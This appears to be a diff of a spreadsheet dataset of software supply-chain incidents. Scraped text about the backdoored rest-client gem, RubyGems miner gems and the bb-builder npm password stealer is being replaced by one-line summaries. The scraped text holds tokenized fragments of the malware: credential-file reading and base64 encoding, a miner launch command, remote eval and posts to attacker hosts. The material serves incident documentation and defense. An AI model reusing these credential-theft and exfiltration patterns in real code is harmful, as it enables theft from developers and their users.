-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'restclient', 'restclient', 'public', 'notification', 'star', 'issue', 'request', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'cve201915224', 'version', 'malicious', 'backdoor', 'open', 'task', 'juskoljo', 'issue', 'comment', 'open', 'task', 'cve201915224', 'version', 'malicious', 'backdoor', 'juskoljo', 'issue', 'comment', 'label', 'comment', 'link', 'summary', 'attacker', 'series', 'restclient', 'version', 'credential', 'restclient', 'maintainer', 'rubygemsorg', 'account', 'version', 'small', 'number', 'time', 'juskoljo', 'malicious', 'version', 'issue', 'team', 'version', 'affected', 'maintainer', 'account', 'several', 'gem', 'version', 'identical', 'version', 'order', 'supersede', 'version', 'dependency', 'version', 'unaffected', 'impact', 'malicious', 'backdoor', 'version', 'rail', 'installation', 'production', 'code', 'pastebin', 'home', 'execute', 'instruction', 'mine', 'cryptocurrency', 'purpose', 'restclient', 'user', 'series', 'user', 'last', 'week', 'rail', 'production', 'environment', 'gemfilelock', 'file', 'malicious', 'version', 'command', 'useful', 'dirtosearch', 'includegemfilelock', 'restclient', 'remediation', 'restclient', 'number', 'step', 'response', 'incident', 'version', 'user', 'reason', 'unable', 'modern', 'version', 'restclient', 'confidence', 'bundle', 'second', 'establish', 'practice', 'twofactor', 'authentication', 'rubygemsorg', 'account', 'available', 'last', 'year', 'third', 'policy', 'activity', 'continuity', 'active', 'late', 'release', 'prior', 'today', 'surprise', 'restclient', 'several', 'active', 'many', 'year', 'rubygemsorg', 'team', 'number', 'upstream', 'improvement', 'response', 'prevalence', 'attack', 'popular', 'open', 'source', 'library', 'show', 'specific', 'user', 'release', 'email', 'notification', 'owner', 'disabled', 'free', 'email', 'provider', 'plan', 'password', 'list', 'password', 'work', 'progress', 'contribution', 'reference', 'cve201915224', 'original', 'report', 'restclient', 'rubygemsorg', 'review', 'late', 'version', 'remote', 'code', 'information', 'begin', 'rescue', 'exception', 'thread', 'loop', 'sleep', 'eval', 'rail', 'code', 'urlhost', 'localhost', 'openssl', 'require', 'base64', 'publickey', 'openssl', 'pkey', 'read', 'base64', 'urlsafedecode64', 'sendfile', 'prepend', 'module', 'definemethod', 'call', 'signature', 'match', 'session', 'split', 'signature', 'base64', 'urlsafedecode64', 'signature', 'payload', 'base64', 'urlsafedecode64', 'payload', 'publickey', 'openssl', 'signature', 'payload', 'super', 'urlhost', 'localhost', 'faraday', 'post', 'httpmironanoruzzzcomua', 'urlhost', 'urlhost', 'length', 'kgibwb3l', 'module', 'authenticate', 'password', 'kgibwb3l', 'email', 'password', 'rescue', 'super', 'identity', 'prepend', 'loop', 'break', 'empty', 'kgibwb3l', 'post', 'httpmironanoruzzzcomua', 'text', 'error', 'thumb', 'faqndo97', 'confused', 'skinofstar', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'issue', 'malware', 'miner', 'gem', 'copy', 'link', 'juskoljo', 'good', 'catch', 'record', 'incident', 'reporter', 'update', 'notice', 'restclient', 'download', 'issue', 'motoyasusaburi', 'thedrow', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'pusher', 'account', 'mwmanning', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'mattmanning', 'rubygem', 'account', 'looneym', 'longkt90', 'thumb', 'thumb', 'andyzickler', 'heart', 'rocket', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'version', 'httpsrubygemsorggemsrestclientversion', 'kb', 'reaction', 'wrong', 'issue', 'copy', 'link', 'multifactor', 'authentication', 'thumb', 'thumb', 'rocket', 'harrynewsome', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'case', 'people', 'detailed', 'report', 'company', 'host', 'attacker', 'environment', 'variable', 'host', 'attacker', 'setup', 'credential', 'service', 'database', 'payment', 'service', 'provider', 'host', 'attacker', 'attacker', 'cookie', 'code', 'authenticate', 'method', 'identity', 'class', 'time', 'method', 'emailpassword', 'attacker', 'unsure', 'library', 'identity', 'class', 'thumb', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'available', 'httpsdiffcoditsuiodiffs7b368951323a42b9b2ed15da4ed4f17c', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'find', 'project', 'figured', 'other', 'code', 'project', 'live', 'grep', 'restclient', 'late', 'branch', 'project', 'safe', 'different', 'running', 'production', 'guarantee', 'project', 'attention', 'jandintel', 'message', 'update', 'variable', 'credential', 'password', 'gravitystorm', 'thumb', 'michaelpaddle', 'rocket', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'opakalex', 'commented', 'love', 'thumb', 'thumb', 'opakalex', 'heart', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'definitive', 'list', 'version', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'proposal', 'mandatory', 'caendekerk', 'chazanov', 'rubyfeedback', 'thumb', 'harrynewsome', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'proposal', 'mandatory', 'many', 'ukrainian', 'family', 'finsterdexter', 'grahamc', 'yacinemtb', 'mpxc8102', 'vemv', 'ondrek', 'rocket', 'emoji', 'charlyjazz', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'thumb', 'rubyfeedback', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'suggestion', 'thumb', 'rubyfeedback', 'thumb', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'course', 'ukrainians', 'hacker', 'true', 'moneydriven', 'malware', 'wealth', 'centre', 'capitalism', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'chazanov', 'sorry', 'smiley', 'next', 'time', 'ironic', 'comment', 'jfdhuiz', 'thumb', 'victoriastuart', 'walkerab', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'version', 'auto', 'guy', 'thank', 'hacker', 'stupid', 'system', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'quick', 'file', 'system', 'name', 'thumb', 'michaelpaddle', 'eye', 'reaction', 'reaction', 'reaction', 'wrong', 'fabdbt', 'issue', 'patch', 'restclient', 'rubocop', 'test', 'link', 'karlyan17', 'euw', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'clean', 'version', 'people', 'automatic', 'update', 'procedure', 'branch', 'noninfected', 'version', 'rubyfeedback', 'thumb', 'michaelpaddle', 'eye', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'opakalex', 'version', 'auto', 'guy', 'thank', 'hacker', 'stupid', 'system', 'issue', 'rubygem', 'request', 'version', 'version', 'restclient', 'user', 'release', 'significant', 'update', 'user', 'real', 'pain', 'time', 'changelog', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'nfedyashev', 'people', 'auto', 'update', 'stupid', 'sorry', 'good', 'push', 'update', 'version', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'sorry', 'misunderstood', 'point', 'late', 'version', 'crazy', 'dgtlmoon', 'reneweteling', 'reaction', 'reaction', 'sorry', 'enable', 'rubygem', 'owner', 'rubyem', 'noredinkfirstaftercreatedat5', 'enable', 'noredinklivefixtures32', 'open', 'enable', 'rubygem', 'alexfarrillcapistranomysqldump13', 'enable', 'rubygem', 'enable', 'rubygem', 'copy', 'link', 'opakalex', 'introduce', 'policy', 'reviewing', 'release', 'project', 'coditsu', 'bundler', 'plugin', 'mandatory', 'piece', 'cake', 'reaction', 'wrong', 'copy', 'link', 'opakalex', 'coditsu', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'quality', 'tool', 'ruby', 'docker', 'container', 'permanent', 'access', 'here', 'httpsappcoditsuiokarafkabuildscommitbuilds10a892f5aef649c6ba29e2362b841c90validation', 'deprecation', 'review', 'version', 'plugin', 'vote', 'organisation', 'block', 'dep', 'httpsappcoditsuiokarafkabuildsvalidationsb689b02836ef4ed9a498347c2da2b25boffense', 'early', 'access', 'datum', 'code', 'access', 'work', 'reaction', 'wrong', 'copy', 'link', 'wonder', 'infected', 'gem', 'available', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'thank', 'check', 'source', 'code', 'easy', 'tool', 'fool', 'external', 'check', 'sorry', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'course', 'thing', 'ability', 'rubygem', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'wonder', 'infected', 'gem', 'available', 'legacy', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'shanesveller', 'thread', 'maintainer', 'course', 'productive', 'conversation', 'colincromar', 'rmetzler', 'reneklacan', 'raybaxter', 'thumb', 'michaelpaddle', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'opakalex', 'program', 'people', 'modern', 'tool', 'shit', 'ocean', 'shit', 'easy', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'michaelpaddle', 'command', 'install', 'work', 'test', 'file', 'echo', 'restclient', 'gemfilelock', 'command', 'includegemfilelock', 'restclient', 'devnull', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'love', 'great', 'terrible', 'btrd', 'virtuexru', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'michaelpaddle', 'suggestion', 'autoupdate', 'machine', 'show', 'people', 'cleanupchange', 'passwordsrotate', 'credential', 'heart', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'danfinlay', 'similar', 'event', 'ecosystem', 'year', 'favorite', 'takeaway', 'blog', 'code', 'hack', 'hack', 'possible', 'impact', 'joepie91', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'opakalex', 'similar', 'event', 'ecosystem', 'year', 'favorite', 'takeaway', 'blog', 'code', 'hack', 'hack', 'possible', 'impact', 'braine', 'thumb', 'kovetskiy', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'code', 'hack', 'hack', 'possible', 'impact', 'major', 'structural', 'thing', 'work', 'ukranian', 'domain', 'business', 'indicator', 'reaction', 'wrong', 'copy', 'link', 'attack', 'list', 'dependants', 'version', 'averell23', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'worth', 'additional', 'version', 'installation', 'error', 'point', 'user', 'risk', 'stuff', 'user', 'great', 'risk', 'compromise', 'graphman65', 'thumb', 'reaction', 'reaction', 'wrong', 'restclient', 'limited', 'conversation', 'collaborator', 'link', 'member', 'lively', 'discussion', 'relevant', 'follow', 'reaction', 'title', 'warning', 'restclient', 'cve201915224', 'version', 'malicious', 'backdoor', 'label', 'copy', 'link', 'member', 'restclient', 'email', 'announcement', 'list', 'attacker', 'series', 'restclient', 'version', 'credential', 'restclient', 'maintainer', 'rubygemsorg', 'account', 'version', 'small', 'number', 'time', 'malicious', 'version', 'issue', 'team', 'version', 'affected', 'maintainer', 'account', 'several', 'gem', 'malicious', 'backdoor', 'version', 'rail', 'installation', 'production', 'code', 'pastebin', 'home', 'execute', 'instruction', 'mine', 'cryptocurrency', 'purpose', 'restclient', 'user', 'series', 'user', 'last', 'week', 'rail', 'production', 'environment', 'gemfilelock', 'file', 'malicious', 'version', 'command', 'useful', 'dirtosearch', 'includegemfilelock', 'restclient', 'restclient', 'number', 'step', 'response', 'incident', 'version', 'user', 'reason', 'unable', 'modern', 'version', 'restclient', 'confidence', 'bundle', 'second', 'establish', 'practice', 'twofactor', 'authentication', 'rubygemsorg', 'account', 'available', 'last', 'year', 'third', 'policy', 'activity', 'continuity', 'active', 'late', 'release', 'prior', 'today', 'surprise', 'restclient', 'several', 'active', 'many', 'year', 'rubygemsorg', 'team', 'number', 'upstream', 'improvement', 'response', 'prevalence', 'attack', 'popular', 'open', 'source', 'library', 'show', 'specific', 'user', 'release', 'email', 'notification', 'owner', 'disabled', 'free', 'email', 'provider', 'plan', 'password', 'list', 'password', 'work', 'progress', 'contribution', 'thank', 'patience', 'support', 'andy', 'reference', 'cve201915224', 'reaction', 'sorry', 'wrong', 'sign', 'free', 'subscribe', 'conversation', 'account', 'sign', 'label', 'none', 'development', 'branch', 'request', 'participant', 'other', 'footer', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3543,17 +3080,12 @@
       </c>
       <c r="C120" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom malware miner gems closed opened issue comments closed malware miner gems opened issue comments comments copy link contributor commented read restclientrestclient713 search similar problems using gemcodesearch found gems contain malware mining software znzaluminium csearch filereadrootgemcredentials homegemcodesearchgemcodesearchlatestgemawesomebot1180exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemblockchainwallet007exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflingversion3linuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemcomingsoon028exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemdogecoin102exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemlitacoin003exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn homegemcodesearchgemcodesearchlatestgemomniauthamazon101exttrellislikeunflamingwafflinglinuxrb gemconent base64encode64filereadrootgemcredentialsgsubn znzaluminium csearch cpuminer homegemcodesearchgemcodesearchlatestgemblockchainwallet007exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemblockchainwallet007exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflingversion3linuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflingversion3testshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemcomingsoon028exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemcomingsoon028exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemdogecoin102exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemdogecoin102exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemlitacoin003exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemlitacoin003exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull homegemcodesearchgemcodesearchlatestgemomniauthamazon101exttrellislikeunflamingwafflinglinuxrb fileutilsmvdircpuminer tmpbell homegemcodesearchgemcodesearchlatestgemomniauthamazon101exttrellislikeunflamingwafflingtestshcd tmpbell nohup cpuminer cpuminerconfjson devnull text updated successfully errors encountered jcambass vbalazs mbillard beyarz bgeesaman n350071 kyswtnb bogn83 cben kenjiuno kratob reacted heart emoji mebeim reacted rocket emoji hkdnet juskoljo oooooooq kachick lingfennan kenmiike tanema kyswtnb reacted eyes emoji reactions reactions reaction reactions copy link contributor mame commented dont miss comingsoon cronparser znzaluminium homegemcodesearchgemcodesearchlatestgemexttrellislike homegemcodesearchgemcodesearchlatestgemawesomebot1180exttrellislike homegemcodesearchgemcodesearchlatestgemblockchainwallet007exttrellislike homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislike homegemcodesearchgemcodesearchlatestgemcoinbase422exttrellislike homegemcodesearchgemcodesearchlatestgemcomingsoon028exttrellislike homegemcodesearchgemcodesearchlatestgemcronparser1013exttrellislike homegemcodesearchgemcodesearchlatestgemdogecoin102exttrellislike homegemcodesearchgemcodesearchlatestgemlitacoin003exttrellislike homegemcodesearchgemcodesearchlatestgemomniauthamazon101exttrellislike reactions sorry something went wrong copy link member sonalkr132 commented thank report yanked abovementioned versions locked owners httpsgithubcomrubygemsrubygemsorgwikigemsyankedandaccountslocked19aug2019 mame udzura jcambass cappert nurcholisart edgarortegaramirez n350071 ouyangjinting bogn83 reacted thumbs emoji gregmolnar bogn83 reacted heart emoji reactions reactions reactions sorry something went wrong sonalkr132 closed completed simcop2387 mentioned issue feature request factor auth andkpause292 open copy link jjarmoc commented submitted rubyadvisorydb lands bundleraudit detect usage affected gems gemfilelock thought might helpful working assess impact projects always highly recommend using bundleraudit step build deploy process reactions sorry something went wrong sign free join conversation github already account sign comment assignees assigned labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>The RubyGems.org codebase was searched for malware and mining software, and several instances were found.</t>
         </is>
       </c>
       <c r="D120" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/issues/2097</t>
-        </is>
-      </c>
-      <c r="E120" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'malware', 'miner', 'gem', 'issue', 'comment', 'malware', 'miner', 'gem', 'issue', 'comment', 'comment', 'link', 'contributor', 'similar', 'problem', 'gemcodesearch', 'gem', 'mining', 'software', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'gemconent', 'homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflinglinuxrb', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'homegemcodesearchgemcodesearchlatestgemcapistranocolors055exttrellislikeunflamingwafflingversion3linuxrb', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'homegemcodesearchgemcodesearchlatestgemdogecoin102exttrellislikeunflamingwafflinglinuxrb', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'homegemcodesearchgemcodesearchlatestgemomniauthamazon101exttrellislikeunflamingwafflinglinuxrb', 'gemconent', 'base64encode64filereadrootgemcredentialsgsubn', 'znzaluminium', 'error', 'rocket', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'link', 'contributor', 'reaction', 'wrong', 'copy', 'link', 'member', 'thank', 'report', 'version', 'owner', 'bogn83', 'thumb', 'bogn83', 'heart', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'simcop2387', 'issue', 'feature', 'request', 'factor', 'auth', 'andkpause292', 'open', 'copy', 'link', 'land', 'bundleraudit', 'usage', 'affected', 'gem', 'helpful', 'impact', 'project', 'bundleraudit', 'step', 'build', 'deploy', 'process', 'reaction', 'sorry', 'wrong', 'sign', 'free', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3570,17 +3102,12 @@
       </c>
       <c r="C121" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog appsec supply chain august package walked away passwords detecting malware package manager repositories blog author tomislav peričin chief software architect cofounder reversinglabs read software developers increasingly targeted supply chain attacks popularization package managers integration development pipelines made ecosystem interesting target various actors testament successful they’ve become frequency stories appear media recently feels like supply chain attacks discovered talked daily basis developer account build environment compromise main ways attackers subvert development infrastructure almost infinite number ways plant malware introduce backdoors software package backdoors particularly tricky detect single line code changes logic program backdoor allows unauthorized access system similarly single line code takes script reach remote server download instructions execute infected machine supply chain attacks usually detected postinfection developers upon realization something going system malware usually follows successful backdoor installation second stage payload anything credential stealing malware ransomware crypto mining software today’s world attackers financially motivated position sort gain complexity finding supply chain attacks cannot overstated backdoor leads infection single line code that’s hidden away surrounded hundreds others written original software authors backdoored package million others hosted package repository makes checking code daunting task least node package manager aimed primarily javascript developers behemoth hosts almost packages turn consist billion files 375tb worth data numbers getting bigger passing processed entire repository titanium platform static analysis solution running single server epyc core processor nvme disks analysis took slightly days hours complete we’ve collected indexed around 16tb worth metadata metadata generated static analysis engine allows hunt malicious files answer complex questions like packages contain portable executable files similar previously known malicious pieces code implied title blog find looking breakdown interesting file types subtypes we’ve found analysis there’s certainly packages javascript breakdown filetypes subtypes across repository intrigued presence executable code windows files graph decided take closer look packages containing file type among plethora mono applications common thirdparty libraries stood pretty wellknown potentially unwanted application password recovery tool call kinds applications potentially unwanted misuse context password recovery tool used refresh memory forget website credential found repository probably password recovery tool question webbrowserpassview used recover website login information stored internet explorer mozilla firefox google chrome safari opera browsers webbrowserpassview interface usage pretty straightforward that’s reason actors appeal tool fact used programmatically command line without even showing graphical interface store credentials list shown file makes perfect actors complexity password recovery taken away focus really matters easy credentials found password recovery tool package called bbbuilder story certainly interesting uploaded repository pretty active open source developer someone hundreds projects personal github page bbbuilder project isn’t furthermore recently published updated project page telling account probably isn’t actively used anymore inspection code within different versions bbbuilder paints picture code developed help metadata registry tracks packages timeline supply chain attack perfectly reconstructed bbbuilder project created initial version uploaded repository package empty contains basic placeholder manifest likely done test compromised developer credentials still valid bbbuilder project updated version first version include password recovery tool however rudimentary javascript code calls tool passwords html file likely done test level repository would detect password recovery tool block package malicious bbbuilder project updated version dependency axios package added http client post requests dependency used submit password recovery output server hosted http1hostjwtech1337pwn bbbuilder project updated version attacker realizes storing password recovery output current working directory probably isn’t greatest idea decides change discreet location bbbuilder project updated version attacker realizes server that’s receive passwords isn’t getting traffic test machine there’s code incorrectly tries locate password recovery output fixed bbbuilder project updated version attacker refactors code little make easier maintain road bbbuilder project updated version attacker decides leaving evidence form password recovery output also isn’t great idea decides code deletes submission previously mentioned server final version bbbuilder project following image shows entirety javascript code performs credential theft bbbuilder javascript download statistics package give glimpse possible prevalence field download statistics project bbbuilder package isn’t included dependency therefore installation prevalence attributed wrongful installation developers looking different package similar name repository hosts dozen packages start term likely ones installed bbbuilder mistake looking package bbbuild instead domain collected stolen credentials gone point damage bbbuilder package cause without practically zero existence cautionary tale easy kinds attacks hide plain sight easy remain undetected long time titanium platform ultimate static analysis solution capable taking challenge large dataset analysis power isn’t malware detection rules we’ve also flexibility gives users extend adding allows rapid hunting iterations regardless dataset processed public like private hunting threats never fast preventing software supply chain attacks target developers possible platform inspect every single package affected packages sha256 bbbuilder100 fb160a0b7b139e38a4922a4337230da7a20e38995f9513971428945babfe688c bbbuilder101 06a80e6e86c70f56ca253efd0cf3fb7d5491756a30d10648a25b615b04d87d95 bbbuilder102 5467f6c7b92e31681fb23a63242304d3c3c90b4e8a101fe32fd5cd78015bb4dd bbbuilder103 835edf362c92a6603df943167dcd52b18f5cf422d13ca92089b4919c331dcffe bbbuilder104 f0f0cab3e665063ec607d3a389cc11e76676510b494aa45e3321de8a1eef94dc bbbuilder105 d374e697c52b701a80e6460bba905afbcc32961f2384c380cae0d471abd6ea39 bbbuilder106 f0af6bfb31acd4b73ba75efa4c135a498e8545ac0bf74abd8b654d38a27a4e55 disclosure timeline contacted team team removes packages advisory learn static analysis find malicious code within package manager repository listen podcast hosted cyberwire detecting malware package manager repositories speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain webinar state software supply chain gartners guidance managing software supply chain risk tags appsec supply chain blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t>bb-builder was created to mimic the bb-build package using the account of a developer with hundreds of legitmate JavaScript packages.  It collects and exfiltrates passwords stored within a browser.</t>
         </is>
       </c>
       <c r="D121" t="inlineStr">
         <is>
           <t>https://blog.reversinglabs.com/blog/the-npm-package-that-walked-away-with-all-your-passwords</t>
-        </is>
-      </c>
-      <c r="E121" t="inlineStr">
-        <is>
